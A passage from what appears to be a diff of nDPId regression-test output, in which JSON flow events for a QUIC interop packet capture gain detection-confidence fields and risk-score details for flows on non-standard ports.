R\/TPIRkDa\/UKbcYJHJmruB8l71Ug149yMVHLyQ8PV4VkmIVimW0BwUZuqJHajnymZIECYtitexCiylm89U6E7Qol819M+CywoEZr0V1MUihq4vQCqT5IBPFtDKGbeUpuwEn9i1Sgfq7jW1ZF1lUJIXXxoY0W43gHceg0ibsXFS2Cu4BfCo2ARjzNDy5YP1fNhA\/sgI1UdsrpLLPnxOQD5MfwhgvGMBjmhjcscvgGoJNS3Mx4JzKbLqHshaWSTm\/LyTt9E6jEOyn\/elJ+Uz6TroidfobWRhT8DXti09Tw4xFpYjmFZS+sjqusErMX8BBmq9NavLEXrEkHMrSv7giTu2WivWYnhggGPBzPi9d7guvk48fb3nlBrDj9TyQ7mUjwRAlCv17XyLwk7KOYmtZZXJ3321lkp3bmJyRSPXB\/cv7ueIG6B+ug3kzrxt89xujNCeWtGdEmI4jIC4JS9GS8VFpY7y1HNYDb2ndNpNf5J7iwIXFXOR2gvyMqscy9rfPY85w\/ZzY6vHurlVpM9w3a5PREuXPDz6VgOdr20pgeNU8H73abMQojEillRJA93bqllSySvQYTvxdmLNI3kPK75CNOjeEksYsdF7tGWuteetV2CpVGc4fAfn7pKXvGC3QvR5rVa7kBRQpXGu246udb5IgCJQW4SWv9D41hRqVUqIhpV+jfVmbkfVSLTLo2RzlmBj7+a2aFtIWbpD7ANiOaRAl7rP5vSHQitoEDWhRQ+6AbGkwcuA7VjuhPuIHlBFBS73grpagTsbteLREgIXGdJVrSiF6wKPaotOPfLYFzLFzvsgAarE+d+Elzh343xLNOiKrK7GDHu3e49eOp9NamSo58Re3QCUDS3FIkTeME1ExL615hIro9N+tcv+\/TrXYarHmxDV0fGJC7I0oBmuLRb11ikCjaYc6FY98talPqVaf+74l6lZuX0twbSRQ9goQdc51kkKoNwIaEylg7FfWyw5YsxdYuXULPPqj5K3zNn8+VwtSMMfxRV+4q2DeFNLKi7SNoJlVxKbF9\/5E6m0hlFWybv1hE9ouYojrE6vOOYfXs3ptJPhGZaJArOV3rdeUnWT8I\/a\/Z7lnYxa5s8i\/zgpZP8zMFkDMjgYLge9GAnCTc\/tmQghNwZWih\/TQ=="}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434518,"flow_last_seen":1603816434518,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434518,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434518,"flow_last_seen":1603816434518,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434518,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quant.eggert.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434519,"flow_last_seen":1603816434519,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434519,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1603816434519,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434519,"pkt":"pJGxgjQ5PKn0qB\/sht1gBLPeBNgRQCABCwcKydWupNP+R2kegH0gAQvIR6QcJQAAAAAAAAAB67oBuwTYAdrFCgoKCgjhAy9VFSPmbQAARL7A303oZAFgGrTdGfei\/mHvqz29qgHXvt1vCJg2pc8FQKC36WDnBuPNUSWLIPLEGFVHDdTlHgEU8JaXOv5IcEJ6NZixRK+p1qGiKw+JPZoJHLOP3KMbB5ngi1RcHFIqjWkGqrO6Il1aIL5lyoE01q8y31quARUppPZlbh9u8WyKOZncFcG5VSpCu3UE+cTCqpGjHOnXC\/1HVlcF0rPYeaHUMOcvFeS7y7V49OnzF7ttNLuTcyzNKgrnqbXVeEFjqLCnQqFji\/PE8S791D2YivE\/b7eIwJzHPMOZxla3AUW1ggsh\/8zQVMk7TQ77ZAmxg7c56Ykrcym6mqal+6TN6kIdyk1r8ujmnBp2XTNKpRpO15gBPf\/xmmYsn0LfjAGybSTVfzGe+r9+hhk9FRKWlvSa0mUhD5xcSPxL855ekaVs8es5YbbQJzvgyO0E6jlhqBvBuXAFk7V5bJfYUhuvK7+FV\/vqBa5Dyr1Y4aVAg8uqmcbLqzdH2nG4UUlIo5QS\/5YbcbMVH8iRLcVUqSgPI65pQT1eOh5NtpZaGNEaXfSjJtIcZtks1c9UmuF5RZk5R8RQDxMBmTUIHRWRrWAtXGorI1rYK3OSEHdlNwZLgl\/WhBsg8pHYuSYaJpYetojCp9wSrshudt2xxyszjnmuhkGDIm7Y\/wjwl1afYHDK3hktBEZRnZVWPJaRHBs4awP9h7+ogQbF1JHMgqJ8UHjilyfki+6fs4+HR4\/6MD0nR2lO00THBaPUZEBIBanL39bTcfHJv9V2bghWT79XrP3UcYoKelpB\/ItWidO0yq9fm+CHlz9Et4Ou\/1QyXDWEp+CTMyrOG3vgDdsY85\/lqem3Pk\/TK14Hvru6JNyjBX1qQfwbZ88ltbaToG0yqFOgs2W5Arx9\/dI4Ztfqsjc+585hIsoYnSoLWOXcSri0SP6dHTiXrSLkzfw516ezxXVHyVqjVj05mTnGg6pkVppsXFLKXFlWA1e1ekM\/7pIK3mEFd1m5zAsBvdRI8t0eAjdE\/YqRjTOBuVa2i4QrjzAhkilSHIU4wsKR0bJYrKvlvC6aSvyiIhDJ8TTHnME5NeWT+7GBlVwsE5DxirVv\/piW3kABvaCjRWG\/FT17E9VSZ46Bt\/YDK2K++WfWexMUmiclj\/iNE0u\/2Uu2FqhLdisuC4yPh1npFfTyVb5gd0sFzCfXeCse35OuC0BYyIPm6NlvuaZqtz3phwQTaixo2zFFiJEmFvvuAA7ELwFzzKc41TRB1+kry45l3KOpElwYbMgfd36GZXpWYtuP6E52jGg5RtuhyBlrf788aBNf8sLkyM9xE9KcxBb5QVeJTjT+LcWZdWa+v3KGsrLCPyrX+kiGauCjQ+hs82UiUqVf9Rz3JFbGEwZgYlj7I14qfs\/YcVCcwnxGzpddMNKdr0ra2x1StoIrJ0raVEvvwlSDr+tCYZpUpOYxl90g6gsdiN7MJw2E9wvBWEpyPijuZ0KwxzCd0EAOuXWQRRPgW+xa5IDUzZpOTbVEZnGiINxr7hy0M4cxGp7iAIcmRBu08GCRc89HtXVlh4Lj0ClSbZKBKbo7me+xDowYARa7U5sl5\/iHaXVCKJtSB5\/MjfywY1OM6Rrb\/rUovA=="}
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434519,"flow_last_seen":1603816434519,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434519,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434519,"flow_last_seen":1603816434519,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434519,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h3.stammw.eu","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434523,"flow_last_seen":1603816434523,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1603816434523,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434523,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUASTxAAEARQtzAqAGAKHC\/PLXwEVEE7Eu5ywoKCgoIUh1YuhDqcyAAAETShcZ7U61m3r3pKDSZMAlRkEkMX8IBatc2KSsG3VEj0lAsPYd+5xEo7F0R6rRII91EQq3kY6fRBVYjgUzkelUep6PIw4v1uOUHWVWj9\/CBoCuFmh0QBFTlwFV3ajZYJtEVj\/UMbkT8ggH6NbKSJV7\/7XCOY6sOXc7KO1y3bpcq5D78RQTF3QAnMEYSTjEkBHANDD5W9AIyB1dmHqwExvOJV7YrCF0Wz7pCUTi8XP9KFNvgkhOSPVQjF1KeCLRKAL3ZHtPolipZhKCqRtuCyeyoz\/WKMUWuH2pOJ\/WCN+fIaYqYSu2\/Uw9h6SGQoS6DN0anGtpDnUD0GFob1uYgJfvGsEIlEF4ovhbxwTVp7mrf8Jn1RwQU6cEaGVAGxcwFRF59HEd7DfQ2HqiN6ygOPpQYa4cx7qpW5pucG8spbD1\/cWsvhbhGqD8WXrUrT5FX8eR51cu5\/rSEZZ0hJlrQrcyu1Jo+wtEU248WCYzmcFDU3KkwLTXrWInL3I4\/3lLpKWAzyz04l7KeGoqcwCeKKQ6p1uyWxpMWebh\/pAeZzwZIk8uY57nKlrPOmivZENHW9oA7\/VrJHghXWWSPNWv94zdJtPbS4kaRkkyKA6YWscg88+FeMvb1pCnByg\/FBd8Mkh8FAhvUPdRBKBqvfa6hdS6kOEBzLUDEht1P\/hkx2oxe0tO1cCFKrfKPAgjP7fDs+HjYwYUjQcQs0Lrfeiezhk68WlVN7f3ydw4AyGklyENZMzjbp2KCDTQJw+bwFV8oeqGfVQRe12vWjCN19ZIAet6\/7N00iAsSHL0OYmwIy5kEm9ia7W54BjwDLqYTIVS2lLjOBW8eRTghxgSgQxvjGDeszyBcMdQvXcIFvNEPXDZvspUbePIw91S9T7A3jCp65i7X4r+fn3M7N5F7j58fappJzU95USbFKUMdxds5siewsczbT\/MrC2OkG0+JuLsutjVwruC3oxgf0F68j+vl1Wm0rJIMkpipHqVvhcHhV+OWaqezJa4AMHRf7fdSrYwPxKtdQTJG3\/g7anjqxa6WSX99h5LjVhbxHDD361DVddXanfGMVBhF7hsyy9ONqBFaE0X3vq+HEhBWkG9LtGG68wwwE5NwZds\/5HESH+ia5Ow\/sbVAD5094mw+zs9a70KyvM0z2kZ8P5B1wNaZ7JZ67KSZOdP\/DCz7bP9r0i+DKzjU4mo1fhcDYTbnyYL09iH+yrFC4uLIRq1vlDgFJ2X2xDITqMN6kx\/ZziHpUw0+tusqXNSXNMQMFKUZKnReB3GpZaA4xILTO73fVG7kLqQ2j9Pfhgr0XjkpujIdWgbDJPwVi0egmLmvkiBx2oWjN0pYUqFfvKMLMSROetLN33mIJ7WaM6DIBHm0ZoNLBntXqK2QERM+5VXgRG\/zKfBTkTfngbP7Dw38e4JcE1olS6CghzCOQzrj\/EPi9cO\/THKUsaoFe7VwubEl6zVajKWO\/ftqXQDEtcPyWqS1x9VkXgf+5HCH6y4ZfXz8j0oj\/gEliPbSFZd61V\/W+k+69wJ4Ve8CztvjyEeitwZuhoIUutC7Co\/agYewJuOHM9M9SEui8BMgVWEjqOMxUGgxy\/aNH+S0wwqZxbtmcgxtt\/+dU8H1VYtjo5PU7ihOGqkqbFa6tDbR7MCwkw=="}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434523,"flow_last_seen":1603816434523,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434523,"flow_last_seen":1603816434523,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434523,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434524,"flow_last_seen":1603816434524,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434524,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1603816434524,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434524,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAgmJAAEARCbbAqAGAKHC\/PLT+AbsE7KwIwQoKCgoIe34skUb\/aLsAAETSb8uSUd6EB7gNq4gf6KDxkhY+y87q3CLci6x1EsNvv80WGJPIpKwhzC8+vg4NXuO4unafv2NMJkJjRI6OL98YRtdvYGXB+F3JwCowCuwGqw6jTxikMXRPpRCAgRKO5X\/KxcEwJRdTBT2rlOzU+hO0yWkEtT4rCwTG1V9X6PEAkb8zWYSIsTTFWdbuo8+Hsr3EHPqfyeXbsSzOoMiqiG28CC1UB7fjZJ0W3T0asAlOYWGl8MIKuqHYSMDCaz5\/KR7GxLTjjCeuvA71YVTfkU0Gf1f4xW0HKl3ycj89fZPIImHw1dOmlLMZdNJPHN3oMEV1WzgH15lz2HPaXv7a5Th+I9CCo7LropS0BbFADYctmnMsqGggv3K7uKbyNnulVBXm7b\/tIGeDPKbxhMVyVFX\/OFstaFoYOfWt41Qv0Uz+5xguURoeuY7TUkuJQ2TlXG1IxX6EbnM98toW72ernv2vm8GcA06P94MCodt6GnFnJdalXwd3Z0Zgu8r3434Yhg444uk2HEryaQG3hHsq9RRP13JfK3yZ+q3HWXP97pXxl06amatIARReotx2af2MAxWD4J\/9LErkYyTqlEr6EnBC+7r1cV9IP3w6nfwYEb0VMSsQMzOKiqBofCNQtvNgMmkH5GMWZlDP0T3k9d+0l3FMevNqVwb+iznRosmDKbOnAOsNl2nNjXZYQXWhQqAThjmx79k1nVXVH\/HuAezLxegqma45cG67rPyGRqN3q1h5El6PYgtdZyE5yz+oVR6XOIkyz168X\/Rv7t73N+i0n+IFHPvHuQ+EK3e1BGUIifpyEElK5RsbL4HGjtaWcevK45MDQ3axvbDUEW\/w2lJrfPlXa\/XZ94sTcZvgd9dy1K9MAJdUT1E0ufvAhjda4LLkNYkdVZjhePaG\/OIP0+\/2yjL6i\/866d9NM8o49WaX\/O9Pd296qB4TZaRNaKuBx+CTsP+biUuW\/9YibPEOQBdFkjBprbbH1nXMOpEF6QqyTSSWy1mOqWI7NTc8ioxMC\/07KPAh6S5NvmgDw9rb7lm4u9afeFEO\/2Y2F04NKOOTYQjedcDqmY1izosf6wgBTRlHezP6uNhrQcmJzYaSn3Fg99mguDGzeymhTX46iCjpPSI\/wUScS13iOhxccWK+52NCIsSS1ArhMq7x5GIHJngmyLap8JYRZLzZek50uDc+cvlWv5aWpLq4oeFbzb2UpThvb0S8TbvXwHNE0GcN9NQ47Cz0xMuSlHF7VEKoW\/ldk\/T1mzEivHu6X4HhGg8NuDcJj6aZIVaJae1NxSt5gLl8MTFDp8u0m2DXTpjwFCV3AX\/hN8OLAAu3WZ+A6sHLc1Laby2OYoClrb6PAbfK8O93b7DnY1GdxskJ1zN2DGmXMfzpZYEvO6KwGvo9tWt5MopqXQ2LZWUoyLrLoGDkaMoRzTKI\/QFULy6GKZQuGdZK8BHoqiDwJoTG\/iTyF1KYSQbibwt0sOyty8uw9tMbzTSnr+UrS3c6KjbJG3GNT+Hel2hrgKBCTL1FLUatdsWvxb3xr1uQGvayWgC4e8BQxZ9J4DVcI4Jl9RFSGru0ncBQHVlkznYPLGR5hwEuTrIrbhESI0fIBtr8gRxzc5NuTahe+uchbMgzGi7qkmDsOQtGYpMw30QbIQ=="}
-00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434524,"flow_last_seen":1603816434524,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434524,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434524,"flow_last_seen":1603816434524,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434524,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434528,"flow_last_seen":1603816434528,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434528,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1603816434528,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434528,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA5QJAAEAR53bAqAGAyu7cXJXeEVEE7LxswgoKCgoIN5KvB9nft6kAAETSHGVijjeaIj19wFPg1eU29TK6pHOMAuBm7PlkQXCoUAkcIsjKIox6Tem8bVN8W3P7l09wyVGafUKmNhonG2+PLUPwJedoIYbfaArvK\/RuwZUPJBHiPqclPj8GB4blfNLZCSxE7O80ZWg6IzmaH0ZyK96aL8u3DeLpkwvE+ZiYmPNHLkxCubDvJZKErdDSCNct\/8C0DNjLgLDA2edu7gd5la5GmHjIWyqKCsVDNCJZblHcVBL1VdA06pyamhaIutlHrJtt4MwRHnHaWsi4xtJmIF21kHBkIHdSNDwPpZdZQOo6t6Itpq1ZTpS7VN39q1L5s9axaQwh1msQpQnvxEMKRTjphoLon2C14B0FHuQO+nIydxdhsWr7CdUuXtsSSSuwWO4Ld68XCiQx9y1eBiBAB+GD2Wu\/lb9XwLxv5IssYnU4s6tBvuesFaIcboSu0qDauY6CaPlOVzIvtAJYMstwHjBjgOUg1VLVbW4e8RABqYyrAFgk1Y\/+PtHf\/PYsvCZhOCB5kqbImiRw3h1pD67YavEoB32fyii0nqrXhuOx80OsYd19rZfvwepXx7rsTO7Azrv1gfJUNVyN3GZFPVbu+9bah0bZVb2faEbPsXvHVJ7ADhVuYKBowG3\/vToH88gOsc5MmMiA7BPkeocUuJbep7qVkWVyD6A4XDSMgQOf4snKf3NMnwoOZ5+\/oEP35GdTw+gaNQtPml2DoGyADmvPE2GySCNdXh6kRDEzP1eIDWJ6cblFsWZLk3HJxSVWVK4L5nGv7G236HRvH7cao3OofLUezX5EJcTnlNBjPkG2QPEEcNrUyzgTzeskCKdHWBppAIz5V7d5Rm9KbgwRKyHgP52XfTCa9HE6G\/aWYw8rvnpb3BVO7AuVUTIl+JadVGBMO6HP9MQda7QUWFv6MTUs4VpAGaDAJWfobOxRrmQWeu9NDR0bYEXNNAf7RSIcYCgEjVOU9A87EHcp5jWmc9mASoXlXUjhMutb4712Z6btK9v5ePztTnZNKvllfQgWfQ0YcDu+IovA\/LzcmwpJeiamvlR4aeRi4IENGOnyfwZ+m2LklN5Vs3C\/uAPp9drDmngkL4hb+R4z1IEA0ohBJXoQ+GkgXZ77qbe6ISLXHCPXiKNO4b82HpsRurSda+ao+RM0sD0EiMBh\/TCkxcIcAIltsz8QoSaYF1MGi8GOXIhmTX1jWZrLAHyJmPKC9EuNW9neoG9EJZ+dIX5mFx0oGGaw2sdFPwhkPFTtqOk5AWokoPIwvT5vd4Sa519tHm6athzsvpY\/qhpMhYMBhIn+Ia+ZLRy9h52056DhP7uVx2GyT9ovjnsPolXuMkxrgw2OIdEvaKHwHSLmDh1euVdBDmyBUwspPiAOjuWMEDE13npg368409PBTQTw048QeZ\/V36AB8RGBYvtIGfzBKjh7cAm8l7WE9s5UvaZQy873oVec7lmimiZyEb5LyxRSzZWjXpzMqWJZuYCs9SpKSXnfZSSdiAHAKhypk11NUGFwk3vS\/I5fWfsFxUM+Rlf7z6obYtc9UnzwhZEp+DuRwFp0SSRdY9xJC2al7618o0Fetdd+n5VB8cJhD79oCRxpjuJClhZScv8yRHXQ2tWyL8V5prewYS8GgYGe0z2ZOFSP2ZvQeX70ng=="}
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434528,"flow_last_seen":1603816434528,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434528,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00992{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434528,"flow_last_seen":1603816434528,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434528,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"mew.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
